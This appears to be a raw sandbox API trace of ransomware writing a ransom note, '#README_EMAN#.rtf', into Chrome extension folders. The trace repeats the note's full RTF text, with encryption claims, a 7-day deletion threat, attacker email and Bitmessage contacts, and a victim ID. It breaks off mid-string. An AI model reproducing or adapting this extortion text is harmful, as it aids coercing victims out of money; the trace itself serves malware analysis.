Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.175] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ed55a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n3ÉD\x8bÃ3ÉèsøÿÿH\x83Ä0[ÃÌÇD$\x10\x03\x15", lpUsedDefaultChar=0x0) returned 8717 [0281.176] WriteFile (in: hFile=0x2cc, lpBuffer=0x1ed55a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ed55a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0281.176] CloseHandle (hObject=0x2cc) returned 1 [0281.176] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\#readme_eman#.rtf")) returned 0xffffffff [0281.176] GetLastError () returned 0x2 [0281.176] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0281.177] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m 